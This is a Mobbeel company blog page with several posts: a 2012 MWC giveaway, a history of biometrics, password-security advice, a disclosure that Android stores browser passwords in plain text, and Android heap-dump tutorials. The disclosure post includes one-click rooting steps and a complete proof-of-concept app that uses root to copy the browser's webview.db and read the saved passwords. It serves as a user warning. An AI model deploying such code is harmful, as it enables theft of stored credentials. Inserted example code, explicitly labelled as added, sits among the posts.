Blog

Mobbeel invites you to the World Mobile Congress 2012. Are you going to miss it?


The ONCE draw number ended in 903. The next higher number closest to it is 923, so the winner (pending confirmation) of the draw is María Fernanda Jaramillo Polo. Congratulations! Thanks to everybody for participating; we hope to hear from you soon. See you!

*** LIST OF PARTICIPANTS ***

At Mobbeel we know that you love everything related to smartphones, which is why we want to give you the opportunity to see the cutting-edge advances of the mobile world. We have one 'Exhibition Visitor Pass' ticket to give away, valued at 699€, for the Mobile World Congress 2012, which takes place in Barcelona from February 27th to March 1st. Barcelona will be the capital of the mobile world during the event, and the world's largest mobile manufacturers will all be exhibiting their latest developments. Travel and accommodation are not included.

What do I have to do to participate?

To get your hands on the ticket, you only have to follow one of these options, but if you complete both of them you will have more chances to win.

Don't worry if you were already following us on both social networks: as an existing follower, using the hashtag #MobbeelMWC or leaving a comment on the Facebook plugin will enter you into the draw.

– Click ‘Like’ button on our Facebook fan page (www.facebook.com/mobbeel) and leave a comment on the following Facebook plugin

– Follow us on Twitter (@mobbeel) and use the Hashtag #MobbeelMWC



When is the deadline to participate?

The deadline to participate is February 10th 2012 at 23:59 (GMT+1). On February 11th the draw will be conducted and the winner of the ticket for the MWC 2012 will be announced.

Prize Draw Rules

– On February 11th at 10.00 (GMT +1), Mobbeel will publish on this blog a list with all participants and the number assigned to them.
– The draw will use the last three digits of the ONCE coupon from February 11th, which may be consulted from here. The participant whose number matches those last three digits will be the winner, provided he/she meets the other requirements and conditions of the draw.
– If the digits of the ONCE coupon don't match any participant's number, the winner will be the participant with the next higher number closest to the coupon digits.
– Once the winner is selected, it will be checked that he/she complies with the conditions of the draw, i.e. that the Facebook fan page 'Like' button has been clicked and a comment has been left in the Facebook plugin, or that he/she follows Mobbeel on Twitter (@mobbeel) and has used the hashtag #MobbeelMWC. If these requirements are not met or the winner declines the prize, we will continue with the next consecutive number in ascending order until a winner is found.
– The prize is an "Exhibition Visitor Pass" ticket valued at 699€ for the Mobile World Congress 2012, valid during the entire week of the event (see prices).
– Mobbeel reserves the right to remove from the draw any players using fake accounts to try to increase their chances of winning.
– Mobbeel reserves the right to cancel, suspend or amend these rules, as well as the organization and/or administration of this promotion, with cause.

Biometrics: From Bertillon to Smartphones


“Science is built upon approaches that gradually come closer to the truth.” Isaac Asimov.

In 1879, Alphonse Bertillon, head of the French police photography department, suggested that people could be identified by precise physical measurements.
His system was based on measuring certain lengths and widths of the head and the body, as well as recording individual marks like tattoos or scars.
The system was quickly and widely adopted by American and British police forces, until its failures began to appear, the main problem being that the measurements change over time. From then on, western police forces started using fingerprinting to identify criminals.
In recent years, biometrics has grown from just using a fingerprint, to employing many different identification methods that fall into two broad categories: physiology and behavior.

Physiological biometrics is based on measuring the individual’s unique physical characteristics, such as fingerprint details, patterns of retina veins, iris characteristics or the size and shape of the hand.

Behavioral biometrics identifies unique learned characteristics, such as signature, keystroke dynamics or voice, where speaker recognition compares frequencies and vocal patterns to identify the speaker.


ID cards, PINs and passwords do not actually identify a person, as the owner may hand any of them to someone else. Only biometric readers identify people by unique and unchanging characteristics.
If someone steals or guesses your password, the thief can access your information without difficulty, but impersonating you through your biometric profile, although not impossible, is much harder.
The low reliability of traditional identification methods is illustrated by iSpy, a software package that captures what is typed on a cellphone from a distance of 3 to 60 meters. The goal of the North Carolina University researchers who developed iSpy was to check whether using cellphones in public places could be a risk. The software identifies which keys the user is pressing in 90% of cases.

To address this security issue, the biometrics industry keeps innovating and researching new biometric methods to identify people, such as body odor, ear structure or the brain's electromagnetic signals.
One of the most advanced techniques, with great potential due to its simplicity, is vascular biometrics. This technique studies the thickness of, and the distance between, the veins that lie under our skin. As the pattern is internal, it leaves no trace, providing a high level of security. We may have this technology in our cellphones sooner than we think.

Unlike laptops, which we sometimes leave at home or in the office, mobiles are always with us, wherever we are and wherever we go. This attracts thieves, drawn by the device's value relative to its size, but if we think carefully, the information it contains can be worth much more. A survey by GetSafeOnline.org says that smartphone 'malware' has increased by 800% in just 4 months.
For this reason, in the not-so-distant future biometrics will go from being 'an interesting concept' to being 'a need' in all smartphones.


ABI Research suggests in a recent survey that people are feeling more comfortable using biometric security, which could result in a $3 billion spending increase in biometrics over the next five years. Supporting this prediction, we find cases such as India, which will go from recognizing its people through their membership of a group, according to their caste, tribe or religion, to identifying all its citizens through iris recognition. On the other hand, Isabelle Moeller of the Biometrics Institute considers that 'Public acceptance of biometrics has been slow to grow, and will continue to be an issue until issues of privacy and security of data have been brought up to a level acceptable by the majority of people'.

Another survey done by Goode Intelligence about mobile biometrics foresees an increase from 4 million mobile biometric users that exist in 2011 to 39 million in 2015.
The survey also details how biometrics will work on cellphones, focusing on device protection, e-commerce security, NFC security and replacement of PINs and passwords. According to the survey, fingerprint sensors and voice recognition technology will be the first to appear.

Jose Luis Huertas, CEO of Mobbeel, a company that creates biometric solutions for smartphones, gives us his opinion on these facts. 'Every day we perform more transactions with our smartphones and we store more and more both personal and professional private information. Until now, we could only protect that information with a large amount of forgettable passwords. Furthermore, it is difficult to type long and complex passwords with a tiny smartphone keyboard, so we finally preferred to use passwords which are easy to remember and to type in exchange for losing security. Biometrics is the solution to combine security and comfort and soon all of us will have a high level of security without having to remember anything, anytime, anywhere'.

Passwords are not enough


The latest analysis performed by ZoneAlarm warns us of some shocking facts: 79% of internet users use insecure passwords and 16% create passwords from people's first names. The report says that the most used password is '123456', closely followed by '12345' and '123456789', and, irrespective of language, the next most common password identified was 'password' (密码 in Chinese, пароль in Russian). I'm sure that you have often thought: "Why should I complicate my life thinking up a safe password, which I will never be able to remember, if nobody is actually interested in my account?"

This same false feeling of safety is starting to affect many celebrities, who have been suffering leaks of private information from their accounts.

The first real case of ‘cyber-attack’ against a ‘celebrity’ was in 2005, when hackers obtained access to Paris Hilton’s cell phone and distributed private and compromising photos of her. Mikko Hypponen, chief of investigation of F-Secure, an IT security company, said that hackers found the answer to her not-so-secret security question, which was ‘Tinkerbell’, the name of her Chihuahua.

In December 2010, two young amateur hackers gained access to the email accounts and photos of more than 50 'celebrities', including Lady Gaga, Ke$ha and Justin Timberlake. In this case, they only used simple 'Trojans' and a lot of patience to break into the accounts.

In March 2011, Vanessa Hudgens, from ‘High School Musical’, reported that some photos had been stolen from her Gmail account.

In April 2011, Wayne Rooney announced on Twitter that his cell phone had been hacked. He reported the incident to Scotland Yard and the resulting investigation confirmed that the newspaper ‘News of the World’ had intercepted his private conversations, which led to them publishing damaging details about the English striker’s infidelity with a prostitute.

In August 2011, the rapper Kreayshawn posted on her blog that her Twitter account had been hacked when some photos of her naked appeared.


In September 2011, Scarlett Johansson and Mila Kunis were victims of phone hacking.
This Wednesday, Christopher Chaney was arrested by the Los Angeles FBI thanks to the 'Hackerazzi' operation. The 35-year-old suspect lives in Florida and had illegal access to the accounts of at least 50 famous people, including Christina Aguilera, Scarlett Johansson, Mila Kunis, Simone Harouche and Renee Olstead.

One thing is sure: this kind of hacking against celebrities is not going to disappear. 'This is on the rise', said Hypponen. 'When people see what happened with Scarlett Johansson, you can bet that we are going to find more hackers outside that are trying to do the same with other beautiful actresses'.

This statement by Hypponen leads us to the question: 'How long before this trend extends beyond famous people?'

Here are a few tips you can follow to safeguard your accounts:

Use a good password manager to keep all your passwords safe.

Use a password generator; it doesn't matter if you don't remember your password, because the password manager will remember it for you.

Keep all your private information in a real safe place, using advanced security techniques such as Biometrics (iris, signature recognition).

If none of the above convinces you, you can always delete all your private information, although that may be a bit complicated given the amount of sensitive documents we keep on our computers and cell phones these days.

If, like us, you are convinced that your private information should remain private, you can download BioWallet Signature from the Android Market and save all your documents and passwords securely thanks to signature recognition technology. And if you complement it with Biowallet2Browser, you could send your saved accounts from BioWallet to your browser and login from your computer without fear of being hacked.

One final suggestion, don’t take naked pictures of yourself on your phone! :)

Your passwords are not safe in Android

One of the cornerstones of the Android security model is that a user application cannot read or write the files of other applications. To that end, Android uses the Linux permission model and assigns each application its own user id. This way, it prevents (in theory) our application's data from being accessed by third-party applications, and us from accessing theirs.

This model works perfectly as long as there is no "superuser" on the phone with access to the whole file system (the famous "root"). By default, most Android phones released to the market don't have this root user (with some exceptions, like the GeeksPhone One), but we have all seen methods developed to gain root access on each and every one of these phones. Lately it has become such an easy task that, on many phones, installing an application and clicking a button is all you need.

Most of the time, users gain root access to their devices to install customized ROMs, use applications that need access to protected areas of the system, etc., but they don't realize the security risks this involves.

One of the latest security risks to come to light is that several applications, including the email client and the browser, store the user's passwords without any kind of encryption. They do so because they trust the default Android security, which ensures no other application will be able to read or write these files. However, as we have seen, gaining root access on most current devices is so easy that this security measure is clearly insufficient.

Some people may think that this is just a simple oversight or laziness on the part of these applications' programmers, and that it can easily be solved by encrypting that information, but it is not so easy. In fact, it is a balance between convenience and security. To protect these passwords we would need an additional password to encrypt/decrypt them. And... how is that password stored? In plain text? Encrypted? If we encrypt it we need yet another password, but... what do we do with the password that encrypts the password that encrypts the passwords? In the end, the user has to enter something that cannot be stored on the system and that only he/she knows (or a biometric feature, like the ones BioWallet requires).
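The argument above is that the secret which unlocks a credential store must come from the user at unlock time and never sit on the device. The following is an added example (not Mobbeel's or BioWallet's code) of that shape in Java: the typed passphrase is stretched with PBKDF2 into an AES key, and only salt, nonce and AES-GCM ciphertext are persisted, so a copy of the database taken with root is useless without the passphrase. It assumes a JCE provider with PBKDF2WithHmacSHA1 and AES/GCM (any desktop JDK 7+); the class name PassphraseVault and the sample credential are this example's own.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

/**
 * Credential store gated by a secret the device never holds. What reaches the
 * database is only salt || nonce || AES-GCM ciphertext, so a root copy of it
 * is worthless without the passphrase (the property the browser's webview.db lacks).
 */
public final class PassphraseVault {

    private static final int SALT_LEN = 16;        // bytes, random per blob
    private static final int NONCE_LEN = 12;       // bytes, the standard GCM nonce size
    private static final int TAG_BITS = 128;       // GCM authentication tag length
    private static final int KEY_BITS = 128;       // AES-128 avoids old JDK policy limits
    private static final int ITERATIONS = 100_000; // PBKDF2 work factor, tune to the device
    private static final SecureRandom RNG = new SecureRandom();

    /** Encrypts plaintext under a fresh salt and nonce; returns the blob to persist. */
    public static byte[] seal(char[] passphrase, byte[] plaintext) throws GeneralSecurityException {
        byte[] salt = new byte[SALT_LEN];
        byte[] nonce = new byte[NONCE_LEN];
        RNG.nextBytes(salt);
        RNG.nextBytes(nonce);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, deriveKey(passphrase, salt), new GCMParameterSpec(TAG_BITS, nonce));
        cipher.updateAAD(salt); // the tag also covers the salt, so it cannot be swapped
        byte[] ciphertext = cipher.doFinal(plaintext);
        byte[] blob = new byte[SALT_LEN + NONCE_LEN + ciphertext.length];
        System.arraycopy(salt, 0, blob, 0, SALT_LEN);
        System.arraycopy(nonce, 0, blob, SALT_LEN, NONCE_LEN);
        System.arraycopy(ciphertext, 0, blob, SALT_LEN + NONCE_LEN, ciphertext.length);
        return blob;
    }

    /** Recovers the plaintext; a wrong passphrase or a modified blob fails the GCM tag check. */
    public static byte[] open(char[] passphrase, byte[] blob) throws GeneralSecurityException {
        if (blob.length < SALT_LEN + NONCE_LEN + TAG_BITS / 8) {
            throw new GeneralSecurityException("blob too short to be valid");
        }
        byte[] salt = Arrays.copyOfRange(blob, 0, SALT_LEN);
        byte[] nonce = Arrays.copyOfRange(blob, SALT_LEN, SALT_LEN + NONCE_LEN);
        byte[] ciphertext = Arrays.copyOfRange(blob, SALT_LEN + NONCE_LEN, blob.length);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, deriveKey(passphrase, salt), new GCMParameterSpec(TAG_BITS, nonce));
        cipher.updateAAD(salt);
        return cipher.doFinal(ciphertext); // throws AEADBadTagException on failure
    }

    /** PBKDF2 turns a memorable passphrase into a key; the salt defeats precomputed tables. */
    private static SecretKey deriveKey(char[] passphrase, byte[] salt) throws GeneralSecurityException {
        PBEKeySpec spec = new PBEKeySpec(passphrase, salt, ITERATIONS, KEY_BITS);
        try {
            byte[] raw = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(spec).getEncoded();
            return new SecretKeySpec(raw, "AES");
        } finally {
            spec.clearPassword();
        }
    }

    public static void main(String[] args) throws Exception {
        char[] pass = "correct horse battery".toCharArray(); // constructed sample passphrase
        byte[] blob = seal(pass, "user=alice;password=s3cret".getBytes(StandardCharsets.UTF_8));
        System.out.println("unlocked: " + new String(open(pass, blob), StandardCharsets.UTF_8));
        try {
            open("wrong passphrase".toCharArray(), blob);
        } catch (GeneralSecurityException e) {
            System.out.println("wrong passphrase rejected: " + e.getClass().getSimpleName());
        }
        Arrays.fill(pass, '\0'); // drop the passphrase from memory once the key is no longer needed
    }
}
```

The blob is what an application would write to its database in place of the plaintext row; the PBKDF2 iteration count is the knob that trades unlock latency against brute-force cost on a stolen copy.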

Several methods to exploit this weakness have been published on different blogs. Most of them require a rooted phone, connecting the phone to a computer and activating debug mode, extracting the database from the phone and opening it with specific tools, etc. This gives less experienced users a false sense of security, because they think:

  1. My phone is not rooted, so it is safe.
  2. My phone is rooted, but to find out my passwords somebody would have to steal it, and the attacker would have to be almost an expert hacker.

Actually, the security risk is greater than most users think, because:

  1. If your phone is not rooted but it is lost or stolen, gaining root access is a matter of minutes even for a non-expert.
  2. If your phone is already rooted, nobody needs to steal it and connect it to a computer. Any application you install could be malicious, access your passwords and send them anywhere, and you wouldn't notice.

To prove that this is a real security risk, now we are going to show how to gain root access to a mobile phone in a matter of seconds and we are going to present a sample application that, in a few lines of code, is able to access the browser stored passwords and display them on the screen.

How to get root access on the Motorola Droid

Suppose somebody has got hold of my Motorola Droid, which I consider very secure because I have never activated root access. The attacker only has to:

  1. Download and install UniversalAndroot directly on the phone (there are many more tools; this is just one of the best known).
  2. Open UniversalAndroot and click the "Go Root" button.

  Universal Androot

  3. That's all! The attacker is now root on our phone and can access all the passwords that have been stored in plain text.

PasswordsExploit

If we have already rooted our own phone, the risk is even higher, because a malicious app might request superuser permission under a different pretext and, if we allow it, the application could access the stored passwords and send them anywhere without our consent. To show that creating such an application is very easy and doesn't require a security expert, we present a sample that, in a few lines, is able to access your passwords and display them on the screen (a real malicious application of course wouldn't display them but would silently send them out of the phone).

package com.mobbeel.passwordsexploit;
 
import java.io.DataOutputStream;
import java.io.IOException;
 
import android.app.ListActivity;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.os.Bundle;
import android.widget.ListAdapter;
import android.widget.SimpleCursorAdapter;
import android.widget.Toast;
 
public class PasswordsExploitActivity extends ListActivity {
 
	@Override
	public void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
 
		try {
			//Get root access
			Process process = Runtime.getRuntime().exec("su");
			DataOutputStream os = new DataOutputStream(process.getOutputStream());
			//copy the browser database to a readable directory
			os.writeBytes("cp /data/data/com.android.browser/databases/webview.db /tmp \n");
			//change the permissions to be readable by everybody
			os.writeBytes("chmod 666 /tmp/webview.db \n");
			os.writeBytes("exit\n");
			os.flush();
			process.waitFor();
 
			//end of root commands. Now just open the database and query as usual
			SQLiteDatabase db = SQLiteDatabase.openDatabase("/tmp/webview.db", null, SQLiteDatabase.OPEN_READONLY);
			//SELECT * FROM password;
			Cursor c = db.query("password", null, null,	null, null, null, null);
			startManagingCursor(c);
 
			//display Usernames and Passwords on a list
			ListAdapter adapter = new SimpleCursorAdapter(this,
					android.R.layout.two_line_list_item, c,
					new String[] { "username", "password" },
					new int[] { android.R.id.text1, android.R.id.text2 });
			setListAdapter(adapter);
 
 
		} catch (IOException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		} catch (InterruptedException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		}
 
	}
}

When we run this application on an already rooted phone, it requests permission to execute commands as superuser. We should never grant this permission to applications unless we absolutely trust them.

Superuser request

If we grant it, the application reads the usernames/passwords stored by the browser and displays them in a list.

User's password list

As a conclusion, some recommendations to keep your passwords safe:

  1. Don't root your phone unless you are an experienced user and fully understand the security risks you are taking on.
  2. If you have already rooted your phone, don't grant superuser permission to third-party applications that request it unless you absolutely trust them.
  3. Don't use the option to remember passwords in the browser or any other application that doesn't protect them with another password (or a biometric feature, like BioWallet). Follow this advice not only for the Android browser but also for your desktop browsers, instant messaging clients, etc. As a rule of thumb, any application that can access stored passwords without asking you to identify yourself is not storing them securely.
  4. Use a reliable password manager to store your sensitive information.

Analyze an Android 1.5 memory dump

A couple of days ago we showed you how to get a memory dump of your Android application and open it in Eclipse MAT. That procedure was valid for versions up to 1.1, but it has changed slightly for the new version 1.5 (a.k.a. Cupcake).

  1. The first step doesn't change: make sure /data/misc is writable:

    #su
    #chmod 777 /data/misc

  2. Take note of your application's process number using the Eclipse DDMS perspective or with the 'ps' command within the emulator/phone shell.
  3. Send a SIGUSR1 signal to the process with the command:

    kill -10 <pid number>

  4. In 1.5, a new API has been introduced to generate a dump programmatically: the static method dumpHprofData(String fileName) of the Debug class. Example:

    Debug.dumpHprofData("myAppDump.hprof");

  5. In 1.5 only one dump file is generated (with the pattern heap-dump-tm-pid.hprof), so you no longer need to concatenate it with anything.
  6. You still need to pull it from the emulator/phone to your computer and "deandroidize" it with the hprof-conv tool. The good news is that this tool is now bundled with the SDK, so you don't need to download or compile it anymore.

    adb pull /data/misc/heap-dump-tm<timestamp>-pid<myPid>.hprof .
    hprof-conv heap-dump-tm<timestamp>-pid<myPid>.hprof myDump.hprof

  7. Now you can open it with your preferred memory analysis tool (ours is MAT!).

MAT in eclipse

Analyze an Android 1.1 memory dump with Eclipse MAT

Note: This procedure is valid for SDK versions up to 1.1. For instructions about how to do it in Android 1.5 take a look at this post: Analyze an Android 1.5 memory dump.

In this post we will show you how to get a memory dump of your running Android application, convert it to a standard format supported by the conventional tools and open it with Eclipse MAT (Memory Analyzer Tool) to detect memory leaks.

The memory dump is going to be generated on the /data/misc directory so the first step is modifying its permissions to make sure it is writable.

adb shell
#su
#chmod 777 /data/misc

Note: You can do this on the emulator or if you are working with an Android Developer Phone, but you cannot do it if you are working with a T-Mobile G1 (unless you are root, but that’s for another post). The ‘su’ command is only needed if you are working with an ADP1 because the adb daemon runs as a regular user.

Next, we should run our application and take note of its process number. It can be found using the DDMS view in Eclipse

Process Number

or if you are a command line guy you can use this to list the currently running processes:

#ps

We will use this number to send a SIGUSR1 signal to the process. Currently the Dalvik VM will generate a memory dump in response to two signals, SIGQUIT and SIGUSR1. If you send it a SIGQUIT it will dump the stacks from all running threads; if you send it a SIGUSR1 it will dump the heap profiling data. The most usual way to send the signal to the process is with the kill command:

kill -10 <pid number>

but you can also send it programmatically from inside the application with this code:

android.os.Process.sendSignal(android.os.Process.myPid(), android.os.Process.SIGNAL_USR1);

On a “regular” JVM you could generate a dump in the very moment the first OOM occurs (starting it with the -XX:+HeapDumpOnOutOfMemoryError option), which is very useful, but that feature is not available in Dalvik yet (however, it is on the “to do list” of the Android team).
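The missing HeapDumpOnOutOfMemoryError can be approximated inside the application itself, using the Debug.dumpHprofData(String) method from the Android 1.5 post above. The following is an added example, not code from either post; it assumes Android 1.5 or later and that dumpDir is writable by the app (the post's /data/misc after the chmod, or the app's own files directory). The class name DumpOnOomHandler is this example's own.

```java
import java.io.File;
import java.io.IOException;

import android.os.Debug;
import android.os.Process;

/**
 * Best-effort substitute for -XX:+HeapDumpOnOutOfMemoryError on Dalvik: installed
 * as the default uncaught-exception handler, it writes an HPROF dump whenever a
 * thread dies with an OutOfMemoryError, then hands the error to the handler that
 * was there before (normally the one that shows "Force close" and kills the process).
 */
public final class DumpOnOomHandler implements Thread.UncaughtExceptionHandler {

    private final File dumpDir;
    private final Thread.UncaughtExceptionHandler previous;

    private DumpOnOomHandler(File dumpDir, Thread.UncaughtExceptionHandler previous) {
        this.dumpDir = dumpDir;
        this.previous = previous;
    }

    /** Call once early, e.g. from Application.onCreate(). Calling it again is harmless. */
    public static void install(File dumpDir) {
        Thread.UncaughtExceptionHandler current = Thread.getDefaultUncaughtExceptionHandler();
        if (current instanceof DumpOnOomHandler) {
            return; // already installed; never chain a handler to itself
        }
        Thread.setDefaultUncaughtExceptionHandler(new DumpOnOomHandler(dumpDir, current));
    }

    /** True if the error, or anything in its cause chain, is an OutOfMemoryError. */
    static boolean isOutOfMemory(Throwable t) {
        for (Throwable c = t; c != null; c = c.getCause()) {
            if (c instanceof OutOfMemoryError) {
                return true;
            }
        }
        return false;
    }

    /** Same naming idea as the dumps Dalvik writes on SIGUSR1: timestamp and pid in the name. */
    File dumpFileFor(long timeMillis) {
        return new File(dumpDir, "oom-dump-tm" + (timeMillis / 1000) + "-pid" + Process.myPid() + ".hprof");
    }

    @Override
    public void uncaughtException(Thread thread, Throwable ex) {
        if (isOutOfMemory(ex)) {
            File out = dumpFileFor(System.currentTimeMillis());
            try {
                // Like the SIGUSR1 path this forces a GC first; the allocation that
                // failed has already been released, so there is usually room to write.
                Debug.dumpHprofData(out.getAbsolutePath());
            } catch (IOException e) {
                // Nothing sensible to do while the process is dying; keep the original error.
            }
        }
        if (previous != null) {
            previous.uncaughtException(thread, ex);
        }
    }
}
```

The resulting file is pulled with adb and converted with hprof-conv exactly as in the steps above before opening it in MAT.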

If everything works OK, you should see something like this on the log:

04-28 13:53:32.418: INFO/dalvikvm(22609): threadid=7: reacting to signal 10
04-28 13:53:32.418: INFO/dalvikvm(22609): SIGUSR1 forcing GC and HPROF dump
04-28 13:53:32.418: INFO/dalvikvm(22609): hprof: dumping VM heap to "/data/misc/heap-dump-tm1240926812-pid22609.hprof".
04-28 13:53:35.682: INFO/dalvikvm(22609): hprof: dumping heap strings to "/data/misc/heap-dump-tm1240926812-pid22609.hprof-head".

Now we can pull the generated files to the computer:

adb pull /data/misc/heap-dump-tm1240926812-pid22609.hprof-head .
adb pull /data/misc/heap-dump-tm1240926812-pid22609.hprof .

And we have to join them into a single file. On Windows you can use the 'type' command (or 'cat' on Linux):

C:\...>type heap-dump-tm1240926812-pid22609.hprof-head > android-dump.hprof
C:\...>type heap-dump-tm1240926812-pid22609.hprof >> android-dump.hprof

The generated dump contains Dalvik-specific records that are not part of the standard hprof format, so standard tools won't be able to open it. Luckily, the Android team has released a tool that trims the Dalvik-specific records and converts the dump to the standard format. You can find the source code here.

C:\...>hprof-conv android-dump.hprof standard-dump.hprof

Finally, you can open it with your preferred analysis tool (JHat, JProfiler, MAT, etc.). In this post and the following ones we will be using MAT.

MAT in eclipse

That’s all for now! We will publish more information soon about how to use MAT to detect and solve memory leaks in your application.